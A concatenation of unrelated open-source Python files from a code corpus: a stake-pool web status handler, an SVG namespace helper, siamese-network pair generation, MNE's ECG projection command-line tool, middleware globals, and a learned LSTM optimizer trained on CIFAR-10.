settings.pop('management_key_hash', None)
return bytes(json.dumps(settings, indent=4), 'UTF-8')
def page_address(self, urlSplit):
if len(urlSplit) < 3:
return self.page_error('Must specify address')
address_str = urlSplit[2]
stakePool = self.server.stakePool
try:
summary = stakePool.getAddressSummary(address_str)
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Address </title></head>' \
+ '<body>' \
+ '<h2>Spend Address ' + address_str + '</h2>' \
+ '<h4>Pool Address ' + stakePool.poolAddr + '</h4>'
if 'accumulated' in summary:
content += '<table>' \
+ '<tr><td>Accumulated:</td><td>' + format16(summary['accumulated']) + '</td></tr>' \
+ '<tr><td>Payout Pending:</td><td>' + format8(summary['rewardpending']) + '</td></tr>' \
+ '<tr><td>Paid Out:</td><td>' + format8(summary['rewardpaidout']) + '</td></tr>' \
+ '<tr><td>Last Total Staking:</td><td>' + format8(summary['laststaking']) + '</td></tr>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
else:
content += '<table>' \
+ '<tr><td>Current Total in Pool:</td><td>' + format8(summary['currenttotal']) + '</td></tr>' \
+ '</table>'
content += '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_version(self):
try:
versions = self.server.stakePool.getVersions()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Pool Version: ' + versions['pool'] + '<br/>' \
+ 'Core Version: ' + versions['core'] + '<br/>' \
+ '</p>' \
+ '<p><a href=\'/\'>home</a></p></body></html>'
return bytes(content, 'UTF-8')
def page_index(self):
stakePool = self.server.stakePool
try:
summary = stakePool.getSummary()
except Exception as e:
return self.page_error(str(e))
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<p>' \
+ 'Mode: ' + summary['poolmode'] + '<br/>' \
+ 'Pool Address: ' + stakePool.poolAddr + '<br/>' \
+ 'Pool Fee: ' + str(stakePool.poolFeePercent) + '%<br/>' \
+ 'Stake Bonus: ' + str(stakePool.stakeBonusPercent) + '%<br/>' \
+ 'Payout Threshold: ' + format8(stakePool.payoutThreshold) + '<br/>' \
+ 'Blocks Between Payment Runs: ' + str(stakePool.minBlocksBetweenPayments) + '<br/>' \
+ 'Minimum output value: ' + format8(stakePool.minOutputValue) + '<br/>'
if stakePool.smsg_fee_rate_target is not None:
content += 'SMSG fee rate target: ' + format8(makeInt(stakePool.smsg_fee_rate_target)) + '<br/>'
content += '</p><p>' \
+ 'Synced Height: ' + str(summary['poolheight']) + '<br/>' \
+ 'Blocks Found: ' + str(summary['blocksfound']) + '<br/>' \
+ 'Total Disbursed: ' + format8(summary['totaldisbursed']) + '<br/>' \
+ 'Last Payment Run: ' + str(summary['lastpaymentrunheight']) + '<br/>' \
+ '<br/>' \
+ 'Total Pool Rewards: ' + format8(summary['poolrewardtotal']) + '<br/>' \
+ 'Total Pool Fees: ' + format8(summary['poolfeestotal']) + '<br/>' \
+ 'Total Pool Rewards Withdrawn: ' + format8(summary['poolwithdrawntotal']) + '<br/>' \
+ '<br/>' \
+ 'Total Pooled Coin: ' + format8(int(decimal.Decimal(summary['watchonlytotalbalance']) * COIN)) + '<br/>' \
+ 'Currently Staking: ' + format8(summary['stakeweight']) + '<br/>' \
+ '</p>'
content += '<br/><h3>Recent Blocks</h3><table><tr><th>Height</th><th>Block Hash</th><th>Block Reward</th><th>Total Coin Staking</th></tr>'
for b in summary['lastblocks']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td><td>' + format8(b[3]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Pending Payments</h3><table><tr><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['pendingpayments']:
content += '<tr><td>' + b[0] + '</td><td>' + format8(b[1]) + '</td></tr>'
content += '</table>'
content += '<br/><h3>Last Payments</h3><table><tr><th>Height</th><th>Txid</th><th>Disbursed</th></tr>'
for b in summary['lastpayments']:
content += '<tr><td>' + str(b[0]) + '</td><td>' + b[1] + '</td><td>' + format8(b[2]) + '</td></tr>'
content += '</table>'
content += '</body></html>'
return bytes(content, 'UTF-8')
"""
def page_help(self):
content = '<!DOCTYPE html><html lang="en">\n<head>' \
+ '<meta charset="UTF-8">' \
+ '<title>CapricoinPlus Stake Pool Demo</title></head>' \
+ '<body>' \
+ '<h2>CapricoinPlus Stake Pool Demo</h2>' \
+ '<h3>Help</h3>' \
+ '<p>' \
+ '</p></body></html>'
return bytes(content, 'UTF-8')
"""
def putHeaders(self, status_code, content_type):
self.send_response(status_code)
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', content_type)
self.end_headers()
def handle_http(self, status_code, path):
urlSplit = self.path.split('/')
if len(urlSplit) > 1:
if urlSplit[1] == 'address':
self.putHeaders(status_code, 'text/html')
return self.page_address(urlSplit)
if urlSplit[1] == 'version':
self.putHeaders(status_code, 'text/html')
return self.page_version()
if urlSplit[1] == 'config':
self.putHeaders(status_code, 'text/plain')
return self.page_config(urlSplit)
if urlSplit[1] == 'json':
self.putHeaders(status_code, 'text/plain')
try:
if len(urlSplit) > 2:
if urlSplit[2] == 'version':
return bytes(json.dumps(self.server.stakePool.getVersions()), 'UTF-8')
if urlSplit[2] == 'address':
return self.js_address(urlSplit)
if urlSplit[2] == 'metrics':
return self.js_metrics(urlSplit)
return self.js_index(urlSplit)
except Exception as e:
return self.js_error(str(e))
self.putHeaders(status_code, 'text/html')
return self.page_index()
def do_GET(self):
response = self.handle_http(200, self.path)
self.wfile.write(response)
def do_HEAD(self):
self.putHeaders(200, 'text/html')
def do_OPTIONS(self):
self.send_response(200, 'ok')
if self.server.allow_cors:
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Headers', '*')
self.end_headers()
class HttpThread(threading.Thread, HTTPServer):
def __init__(self, fp, hostName, portNo, allow_cors, stakePool, key_salt=None, key_hash=None):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
self.fp = fp
self.hostName = hostName
self.portNo = portNo
self.allow_cors = allow_cors
self.stakePool = stakePool
self.management_key_salt = 'ajf8923ol2xcv.' if key_salt is None else key_salt
self.management_key_hash = 'fd5816650227b75143e60c61b19e113f43f5dcb57e2aa5b6161a50973f2033df' if key_hash is None else key_hash
self.timeout = 60
HTTPServer.__init__(self, (self.hostName, self.portNo), HttpHandler)
def stop(self):
self.stop_event.set()
# Send fake request
conn = http.client.HTTPConnection(self.hostName, self.portNo)
conn.connect()
conn.request("GET", "/none")
response = conn.getresponse()
data = response.read()
conn.close()
def stopped(self):
return self.stop_event.is_set()
def serve_forever(self):
while not self.stopped():
self.handle_request()
self.socket.close()
def run(self):
self.serve_forever()
|
the-stack_0_12398 | from xml.etree.ElementTree import register_namespace
namespaces = {
'': 'http://www.w3.org/2000/svg',
'inkscape': 'http://www.inkscape.org/namespaces/inkscape',
'sodipodi': 'http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd',
'svg': 'http://www.w3.org/2000/svg',
'freecad': 'http://www.freecadweb.org/wiki/index.php?title=Svg_Namespace',
'xml': 'http://www.w3.org/XML/1998/namespace'
}
def namespaced(name, namespace_prefix=''):
return f'{{{namespaces[namespace_prefix]}}}{name}'
def namespaced_attrib(name, namespace_prefix=''):
if namespace_prefix == '':
return name
return namespaced(name, namespace_prefix)
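# Example usage (illustrative): tag names are returned in Clark notation
# ("{uri}local"), which is the form ElementTree expects for namespaced lookups.
if __name__ == "__main__":
    assert namespaced("svg") == "{http://www.w3.org/2000/svg}svg"
    assert namespaced("label", "inkscape") == (
        "{http://www.inkscape.org/namespaces/inkscape}label"
    )
    # un-prefixed attribute names are left as-is
    assert namespaced_attrib("id") == "id"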
def register_namespaces():
for prefix, url in namespaces.items():
register_namespace(prefix, url) |
the-stack_0_12402 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains functions used for creating pairs from labeled and unlabeled data (currently used only for the siamese network)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import numpy as np
from sklearn import metrics
from sklearn.neighbors import NearestNeighbors
def get_choices(arr, num_choices, valid_range, not_arr=None, replace=False):
"""Select n=num_choices choices from arr, with the following constraints.
Args:
    arr: the pool of choices; if arr is a tuple (lo, hi), the pool is
      interpreted as the integer range [lo, hi)
num_choices: number of choices
valid_range: choice > valid_range[0] and choice < valid_range[1]
not_arr: choice not in not_arr
replace: if True, draw choices with replacement
Returns:
choices.
"""
if not_arr is None:
not_arr = []
if isinstance(valid_range, int):
valid_range = [0, valid_range]
# make sure we have enough valid points in arr
if isinstance(arr, tuple):
if min(arr[1], valid_range[1]) - max(arr[0], valid_range[0]) < num_choices:
raise ValueError('Not enough elements in arr are outside of valid_range!')
n_arr = arr[1]
arr0 = arr[0]
arr = collections.defaultdict(lambda: -1)
get_arr = lambda x: x
replace = True
else:
greater_than = np.array(arr) > valid_range[0]
less_than = np.array(arr) < valid_range[1]
if np.sum(np.logical_and(greater_than, less_than)) < num_choices:
raise ValueError('Not enough elements in arr are outside of valid_range!')
# make a copy of arr, since we'll be editing the array
n_arr = len(arr)
arr0 = 0
arr = np.array(arr, copy=True)
get_arr = lambda x: arr[x]
not_arr_set = set(not_arr)
def get_choice():
arr_idx = random.randint(arr0, n_arr - 1)
while get_arr(arr_idx) in not_arr_set:
arr_idx = random.randint(arr0, n_arr - 1)
return arr_idx
if isinstance(not_arr, int):
not_arr = list(not_arr)
choices = []
for _ in range(num_choices):
arr_idx = get_choice()
while get_arr(arr_idx) <= valid_range[0] or get_arr(
arr_idx) >= valid_range[1]:
arr_idx = get_choice()
choices.append(int(get_arr(arr_idx)))
if not replace:
arr[arr_idx], arr[n_arr - 1] = arr[n_arr - 1], arr[arr_idx]
n_arr -= 1
return choices
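# Example (illustrative): draw 3 distinct indices whose values lie strictly
# inside (2, 10) and are not 5 or 6:
#   choices = get_choices(list(range(10)), 3, valid_range=[2, 10], not_arr=[5, 6])
#   # every c in choices satisfies 2 < c < 10 and c not in {5, 6}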
def create_pairs_from_labeled_data(x, digit_indices, use_classes=None):
"""Positive and negative pair creation from labeled data.
Alternates between positive and negative pairs.
Args:
x: labeled data
digit_indices: nested array of depth 2 (in other words a jagged matrix),
where row i contains the indices in x of all examples labeled with class i
use_classes: in cases where we only want pairs from a subset of the
classes, use_classes is a list of the classes to draw pairs from, else it
is None
Returns:
pairs: positive and negative pairs
labels: corresponding labels
"""
n_clusters = len(digit_indices)
if use_classes is None:
use_classes = list(range(n_clusters))
pairs = []
labels = []
n = min([len(digit_indices[d]) for d in range(n_clusters)]) - 1
for d in use_classes:
for i in range(n):
z1, z2 = digit_indices[d][i], digit_indices[d][i + 1]
pairs += [[x[z1], x[z2]]]
inc = random.randrange(1, n_clusters)
dn = (d + inc) % n_clusters
z1, z2 = digit_indices[d][i], digit_indices[dn][i]
pairs += [[x[z1], x[z2]]]
labels += [1, 0]
pairs = np.array(pairs).reshape((len(pairs), 2) + x.shape[1:])
labels = np.array(labels)
return pairs, labels
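# Example (illustrative): with digit_indices = [[0, 1], [2, 3]] (two classes,
# two examples each), the output alternates positive and negative pairs:
# (x[0], x[1]) labeled 1, (x[0], x[2]) labeled 0, (x[2], x[3]) labeled 1,
# (x[2], x[0]) labeled 0.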
def create_pairs_from_unlabeled_data(x1,
x2=None,
y=None,
p=None,
k=5,
tot_pairs=None,
pre_shuffled=False,
verbose=None):
"""Generates positive and negative pairs for the siamese network from unlabeled data.
Draws from the k nearest neighbors (where k is the
provided parameter) of each point to form pairs. Number of neighbors
to draw is determined by tot_pairs, if provided, or k if not provided.
Args:
x1: input data array
x2: parallel data array (pairs will exactly shadow the indices of x1, but be
drawn from x2)
y: true labels (if available) purely for checking how good our pairs are
p: permutation vector - in cases where the array is shuffled and we use a
precomputed knn matrix (where knn is performed on unshuffled data), we
keep track of the permutations with p, and apply the same permutation to
the precomputed knn matrix
k: the number of neighbors to use (the 'k' in knn)
    tot_pairs: total number of pairs to produce; if provided, it caps how many
      neighbors are drawn per point
    pre_shuffled: whether x1 (and y) have already been shuffled, in which case
      the permutation p is not applied again
verbose: flag for extra debugging printouts
Returns:
    pairs for x1, (pairs for x2 if x2 is provided), labels (inferred by knn),
    (and labels_true, the absolute truth, if y is provided)
"""
if x2 is not None and x1.shape != x2.shape:
raise ValueError('x1 and x2 must be the same shape!')
n = len(p) if p is not None else len(x1)
pairs_per_pt = max(1, min(k, int(
tot_pairs / (n * 2)))) if tot_pairs is not None else max(1, k)
if p is not None and not pre_shuffled:
x1 = x1[p[:n]]
y = y[p[:n]]
pairs = []
pairs2 = []
labels = []
true = []
verbose = True
if verbose:
print('computing k={} nearest neighbors...'.format(k))
if len(x1.shape) > 2:
x1_flat = x1.reshape(x1.shape[0], np.prod(x1.shape[1:]))[:n]
else:
x1_flat = x1[:n]
print('I am hereee', x1_flat.shape)
nbrs = NearestNeighbors(n_neighbors=k + 1).fit(x1_flat)
print('NearestNeighbors')
_, idx = nbrs.kneighbors(x1_flat)
print('NearestNeighbors2')
# for each row, remove the element itself from its list of neighbors
# (we don't care that each point is its own closest neighbor)
new_idx = np.empty((idx.shape[0], idx.shape[1] - 1))
print('replace')
assert (idx >= 0).all()
print('I am hereee', idx.shape[0])
for i in range(idx.shape[0]):
try:
new_idx[i] = idx[i, idx[i] != i][:idx.shape[1] - 1]
except Exception as e:
print(idx[i, Ellipsis], new_idx.shape, idx.shape)
raise e
idx = new_idx.astype(np.int)
k_max = min(idx.shape[1], k + 1)
if verbose:
print('creating pairs...')
print('ks', n, k_max, k, pairs_per_pt)
# pair generation loop (alternates between true and false pairs)
consecutive_fails = 0
for i in range(n):
# get_choices sometimes fails with precomputed results. if this happens
# too often, we relax the constraint on k
if consecutive_fails > 5:
k_max = min(idx.shape[1], int(k_max * 2))
consecutive_fails = 0
if verbose and i % 10000 == 0:
print('Iter: {}/{}'.format(i, n))
# pick points from neighbors of i for positive pairs
try:
choices = get_choices(
idx[i, :k_max], pairs_per_pt, valid_range=[-1, np.inf], replace=False)
consecutive_fails = 0
except ValueError:
consecutive_fails += 1
continue
assert i not in choices
# form the pairs
new_pos = [[x1[i], x1[c]] for c in choices]
if x2 is not None:
new_pos2 = [[x2[i], x2[c]] for c in choices]
if y is not None:
pos_labels = [[y[i] == y[c]] for c in choices]
# pick points *not* in neighbors of i for negative pairs
try:
choices = get_choices((0, n),
pairs_per_pt,
valid_range=[-1, np.inf],
not_arr=idx[i, :k_max],
replace=False)
consecutive_fails = 0
except ValueError:
consecutive_fails += 1
continue
# form negative pairs
new_neg = [[x1[i], x1[c]] for c in choices]
if x2 is not None:
new_neg2 = [[x2[i], x2[c]] for c in choices]
if y is not None:
neg_labels = [[y[i] == y[c]] for c in choices]
# add pairs to our list
labels += [1] * len(new_pos) + [0] * len(new_neg)
pairs += new_pos + new_neg
if x2 is not None:
pairs2 += new_pos2 + new_neg2
if y is not None:
true += pos_labels + neg_labels
# package return parameters for output
ret = [np.array(pairs).reshape((len(pairs), 2) + x1.shape[1:])]
if x2 is not None:
ret.append(np.array(pairs2).reshape((len(pairs2), 2) + x2.shape[1:]))
ret.append(np.array(labels))
if y is not None:
true = np.array(true).astype(np.int).reshape(-1, 1)
if verbose:
# if true vectors are provided, we can take a peek to check
# the validity of our kNN approximation
print('confusion matrix for pairs and approximated labels:')
print(metrics.confusion_matrix(true, labels) / true.shape[0])
print(metrics.confusion_matrix(true, labels))
ret.append(true)
return ret
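# Illustrative calls (hedged): with unlabeled data only, the function returns
# the pairs and their knn-inferred labels; passing the true labels y also
# returns the ground-truth pair labels used for the confusion-matrix printout.
#   pairs, labels = create_pairs_from_unlabeled_data(x1, k=5)
#   pairs, labels, true = create_pairs_from_unlabeled_data(x1, y=y_true, k=5)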
|
the-stack_0_12403 | #!/usr/bin/env python
r"""Compute SSP/PCA projections for ECG artifacts.
Examples
--------
.. code-block:: console
$ mne compute_proj_ecg -i sample_audvis_raw.fif -c "MEG 1531" \
--l-freq 1 --h-freq 100 \
--rej-grad 3000 --rej-mag 4000 --rej-eeg 100
"""
# Authors : Alexandre Gramfort, Ph.D.
# Martin Luessi, Ph.D.
import os
import sys
import mne
def run():
"""Run command."""
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option("-i", "--in", dest="raw_in",
help="Input raw FIF file", metavar="FILE")
parser.add_option("--tmin", dest="tmin", type="float",
help="Time before event in seconds",
default=-0.2)
parser.add_option("--tmax", dest="tmax", type="float",
help="Time after event in seconds",
default=0.4)
parser.add_option("-g", "--n-grad", dest="n_grad", type="int",
help="Number of SSP vectors for gradiometers",
default=2)
parser.add_option("-m", "--n-mag", dest="n_mag", type="int",
help="Number of SSP vectors for magnetometers",
default=2)
parser.add_option("-e", "--n-eeg", dest="n_eeg", type="int",
help="Number of SSP vectors for EEG",
default=2)
parser.add_option("--l-freq", dest="l_freq", type="float",
help="Filter low cut-off frequency in Hz",
default=1)
parser.add_option("--h-freq", dest="h_freq", type="float",
help="Filter high cut-off frequency in Hz",
default=100)
parser.add_option("--ecg-l-freq", dest="ecg_l_freq", type="float",
help="Filter low cut-off frequency in Hz used "
"for ECG event detection",
default=5)
parser.add_option("--ecg-h-freq", dest="ecg_h_freq", type="float",
help="Filter high cut-off frequency in Hz used "
"for ECG event detection",
default=35)
parser.add_option("-p", "--preload", dest="preload",
help="Temporary file used during computation "
"(to save memory)",
default=True)
parser.add_option("-a", "--average", dest="average", action="store_true",
help="Compute SSP after averaging",
default=False) # XXX: change to default=True in 0.17
parser.add_option("--proj", dest="proj",
help="Use SSP projections from a fif file.",
default=None)
parser.add_option("--filtersize", dest="filter_length", type="int",
help="Number of taps to use for filtering",
default=2048)
parser.add_option("-j", "--n-jobs", dest="n_jobs", type="int",
help="Number of jobs to run in parallel",
default=1)
parser.add_option("-c", "--channel", dest="ch_name",
help="Channel to use for ECG detection "
"(Required if no ECG found)",
default=None)
parser.add_option("--rej-grad", dest="rej_grad", type="float",
help="Gradiometers rejection parameter "
"in fT/cm (peak to peak amplitude)",
default=2000)
parser.add_option("--rej-mag", dest="rej_mag", type="float",
help="Magnetometers rejection parameter "
"in fT (peak to peak amplitude)",
default=3000)
parser.add_option("--rej-eeg", dest="rej_eeg", type="float",
help="EEG rejection parameter in uV "
"(peak to peak amplitude)",
default=50)
parser.add_option("--rej-eog", dest="rej_eog", type="float",
help="EOG rejection parameter in uV "
"(peak to peak amplitude)",
default=250)
parser.add_option("--avg-ref", dest="avg_ref", action="store_true",
help="Add EEG average reference proj",
default=False)
parser.add_option("--no-proj", dest="no_proj", action="store_true",
help="Exclude the SSP projectors currently "
"in the fiff file",
default=False)
parser.add_option("--bad", dest="bad_fname",
help="Text file containing bad channels list "
"(one per line)",
default=None)
parser.add_option("--event-id", dest="event_id", type="int",
help="ID to use for events",
default=999)
parser.add_option("--event-raw", dest="raw_event_fname",
help="raw file to use for event detection",
default=None)
parser.add_option("--tstart", dest="tstart", type="float",
help="Start artifact detection after tstart seconds",
default=0.)
parser.add_option("--qrsthr", dest="qrs_threshold", type="string",
help="QRS detection threshold. Between 0 and 1. Can "
"also be 'auto' for automatic selection",
default='auto')
options, args = parser.parse_args()
raw_in = options.raw_in
if raw_in is None:
parser.print_help()
sys.exit(1)
tmin = options.tmin
tmax = options.tmax
n_grad = options.n_grad
n_mag = options.n_mag
n_eeg = options.n_eeg
l_freq = options.l_freq
h_freq = options.h_freq
ecg_l_freq = options.ecg_l_freq
ecg_h_freq = options.ecg_h_freq
average = options.average
preload = options.preload
filter_length = options.filter_length
n_jobs = options.n_jobs
ch_name = options.ch_name
reject = dict(grad=1e-13 * float(options.rej_grad),
mag=1e-15 * float(options.rej_mag),
eeg=1e-6 * float(options.rej_eeg),
eog=1e-6 * float(options.rej_eog))
avg_ref = options.avg_ref
no_proj = options.no_proj
bad_fname = options.bad_fname
event_id = options.event_id
proj_fname = options.proj
raw_event_fname = options.raw_event_fname
tstart = options.tstart
qrs_threshold = options.qrs_threshold
if qrs_threshold != 'auto':
try:
qrs_threshold = float(qrs_threshold)
except ValueError:
raise ValueError('qrsthr must be "auto" or a float')
if bad_fname is not None:
with open(bad_fname, 'r') as fid:
bads = [w.rstrip() for w in fid.readlines()]
print('Bad channels read : %s' % bads)
else:
bads = []
if raw_in.endswith('_raw.fif') or raw_in.endswith('-raw.fif'):
prefix = raw_in[:-8]
else:
prefix = raw_in[:-4]
ecg_event_fname = prefix + '_ecg-eve.fif'
if average:
ecg_proj_fname = prefix + '_ecg_avg-proj.fif'
else:
ecg_proj_fname = prefix + '_ecg-proj.fif'
raw = mne.io.read_raw_fif(raw_in, preload=preload)
if raw_event_fname is not None:
raw_event = mne.io.read_raw_fif(raw_event_fname)
else:
raw_event = raw
flat = None # XXX : not exposed to the user
projs, events = mne.preprocessing.compute_proj_ecg(
raw, raw_event, tmin, tmax, n_grad, n_mag, n_eeg, l_freq, h_freq,
average, filter_length, n_jobs, ch_name, reject, flat, bads, avg_ref,
no_proj, event_id, ecg_l_freq, ecg_h_freq, tstart, qrs_threshold,
copy=False)
raw.close()
if raw_event_fname is not None:
raw_event.close()
if proj_fname is not None:
print('Including SSP projections from : %s' % proj_fname)
# append the ecg projs, so they are last in the list
projs = mne.read_proj(proj_fname) + projs
if isinstance(preload, str) and os.path.exists(preload):
os.remove(preload)
print("Writing ECG projections in %s" % ecg_proj_fname)
mne.write_proj(ecg_proj_fname, projs)
print("Writing ECG events in %s" % ecg_event_fname)
mne.write_events(ecg_event_fname, events)
mne.utils.run_command_if_main()
|
the-stack_0_12405 | """This module is to declare global objects."""
from datetime import datetime
# Configuration Options
global moesif_options
moesif_options = {}
# Debug Flag
global DEBUG
DEBUG = True
# Patch Flag
global MOESIF_PATCH
MOESIF_PATCH = False
# MoesifAPI Client
global api_client
api_client = None
# App Config class
global app_config
app_config = None
# App Config
global config
config = None
# App Config sampling percentage
global sampling_percentage
sampling_percentage = 100
# App Config eTag
global config_etag
config_etag = None
# App Config last updated time
global last_updated_time
last_updated_time = datetime.utcnow()
|
the-stack_0_12407 | import glob
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.autograd as autograd
import torch.optim as optim
from torch.autograd import Variable
import matplotlib.pyplot as plt
import random
from tqdm import tqdm
import multiprocessing
import os.path
import csv
import copy
import joblib
from torchvision import datasets
import torchvision
import seaborn as sns; sns.set(color_codes=True)
sns.set_style("white")
from pdb import set_trace as bp
USE_CUDA = torch.cuda.is_available()
def w(v):
if USE_CUDA:
return v.cuda()
return v
cache = joblib.Memory(location='_cache', verbose=0)
from meta_module import *
class OptimizerOneLayer(nn.Module):
def __init__(self, preproc=False, hidden_sz=10, preproc_factor=10.0):
super().__init__()
self.hidden_sz = hidden_sz
if preproc:
self.recurs = nn.LSTMCell(2, hidden_sz)
else:
self.recurs = nn.LSTMCell(1, hidden_sz)
self.output = nn.Linear(hidden_sz, 1)
self.preproc = preproc
self.preproc_factor = preproc_factor
self.preproc_threshold = np.exp(-preproc_factor)
def forward(self, inp, hidden, cell):
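        # Gradient preprocessing as in "Learning to learn by gradient descent by
        # gradient descent" (Andrychowicz et al., 2016): gradients with magnitude
        # above exp(-preproc_factor) are encoded as (log|g| / p, sign(g)), tiny
        # ones as (-1, exp(p) * g), so the LSTM sees inputs on a comparable scale.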
if self.preproc:
inp = inp.data
inp2 = w(torch.zeros(inp.size()[0], 2))
keep_grads = (torch.abs(inp) >= self.preproc_threshold).squeeze()
inp2[:, 0][keep_grads] = (torch.log(torch.abs(inp[keep_grads]) + 1e-8) / self.preproc_factor).squeeze()
inp2[:, 1][keep_grads] = torch.sign(inp[keep_grads]).squeeze()
inp2[:, 0][~keep_grads] = -1
inp2[:, 1][~keep_grads] = (float(np.exp(self.preproc_factor)) * inp[~keep_grads]).squeeze()
inp = w(Variable(inp2))
hidden0, cell0 = self.recurs(inp, (hidden[0], cell[0]))
#hidden1, cell1 = self.recurs2(hidden0, (hidden[1], cell[1]))
return self.output(hidden0), (hidden0, ), (cell0, )
def detach_var(v):
var = w(Variable(v.data, requires_grad=True))
var.retain_grad()
return var
import functools
def rsetattr(obj, attr, val):
pre, _, post = attr.rpartition('.')
return setattr(rgetattr(obj, pre) if pre else obj, post, val)
# using wonder's beautiful simplification: https://stackoverflow.com/questions/31174295/getattr-and-setattr-on-nested-objects/31174427?noredirect=1#comment86638618_31174427
def rgetattr(obj, attr, *args):
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split('.'))
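# Example (illustrative): for a module with a nested attribute path such as
# net.layers.final_mat.weight, rgetattr(net, 'layers.final_mat.weight') walks
# the dotted path like chained getattr calls, and rsetattr(...) assigns to the
# leaf; do_fit below uses this to swap updated parameters into the optimizee.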
def do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=True):
if should_train:
opt_net.train()
else:
opt_net.eval()
unroll = 1
target = target_cls(training=should_train)
optimizee = w(target_to_opt())
n_params = 0
for name, p in optimizee.all_named_parameters():
n_params += int(np.prod(p.size()))
hidden_states = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
cell_states = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
all_losses_ever = []
if should_train:
meta_opt.zero_grad()
all_losses = None
for iteration in range(1, optim_it + 1):
loss = optimizee(target)
if all_losses is None:
all_losses = loss
else:
all_losses += loss
all_losses_ever.append(loss.data.cpu().numpy())
loss.backward(retain_graph=should_train)
offset = 0
result_params = {}
hidden_states2 = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
cell_states2 = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
for name, p in optimizee.all_named_parameters():
cur_sz = int(np.prod(p.size()))
# We do this so the gradients are disconnected from the graph but we still get
# gradients from the rest
if p.grad is not None:
gradients = detach_var(p.grad.view(cur_sz, 1))
updates, new_hidden, new_cell = opt_net(
gradients,
[h[offset:offset+cur_sz] for h in hidden_states],
[c[offset:offset+cur_sz] for c in cell_states]
)
for i in range(len(new_hidden)):
hidden_states2[i][offset:offset+cur_sz] = new_hidden[i]
cell_states2[i][offset:offset+cur_sz] = new_cell[i]
result_params[name] = p + updates.view(*p.size()) * out_mul
result_params[name].retain_grad()
else:
result_params[name] = p
result_params[name].retain_grad()
offset += cur_sz
if iteration % unroll == 0:
if should_train:
meta_opt.zero_grad()
all_losses.backward()
meta_opt.step()
all_losses = None
optimizee = w(target_to_opt())
optimizee.load_state_dict(result_params)
optimizee.zero_grad()
hidden_states = [detach_var(v) for v in hidden_states2]
cell_states = [detach_var(v) for v in cell_states2]
else:
for name, p in optimizee.all_named_parameters():
rsetattr(optimizee, name, result_params[name])
assert len(list(optimizee.all_named_parameters()))
hidden_states = hidden_states2
cell_states = cell_states2
return all_losses_ever
@cache.cache
def fit_optimizer(target_cls, target_to_opt, preproc=False, unroll=20, optim_it=100, n_epochs=20, n_tests=100, lr=0.001, out_mul=1.0, test_target=None):
opt_net = w(OptimizerOneLayer(preproc=preproc))
meta_opt = optim.Adam(opt_net.parameters(), lr=lr)
best_net = None
best_loss = 100000000000000000
for _ in tqdm(range(n_epochs)):
'''
print("train")
for _ in tqdm(range(20)):
do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=True)
'''
if test_target is not None:
loss = (np.mean([
np.sum(do_fit(opt_net, meta_opt, target_cls, test_target, unroll, optim_it, n_epochs, out_mul, should_train=False))
for _ in tqdm(range(1))
]))
else:
loss = (np.mean([
np.sum(do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=False))
for _ in tqdm(range(1))
]))
print(loss)
if loss < best_loss:
print(best_loss, loss)
best_loss = loss
best_net = copy.deepcopy(opt_net.state_dict())
return best_loss, best_net
class CIFAR10Loss:
def __init__(self, training=True):
dataset = datasets.CIFAR10(
'./data/CIFAR10', train=True, download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
)
indices = list(range(len(dataset)))
np.random.RandomState(10).shuffle(indices)
if training:
indices = indices[:len(indices) // 2]
else:
indices = indices[len(indices) // 2:]
self.loader = torch.utils.data.DataLoader(
dataset, batch_size=128,
sampler=torch.utils.data.sampler.SubsetRandomSampler(indices))
self.batches = []
self.cur_batch = 0
def sample(self):
if self.cur_batch >= len(self.batches):
self.batches = []
self.cur_batch = 0
for b in self.loader:
self.batches.append(b)
batch = self.batches[self.cur_batch]
self.cur_batch += 1
return batch
class CIFAR10Net(MetaModule):
def __init__(self, layer_size=20, n_layers=1, **kwargs):
super().__init__()
inp_size = 3 * 32 * 32
self.layers = {}
for i in range(n_layers):
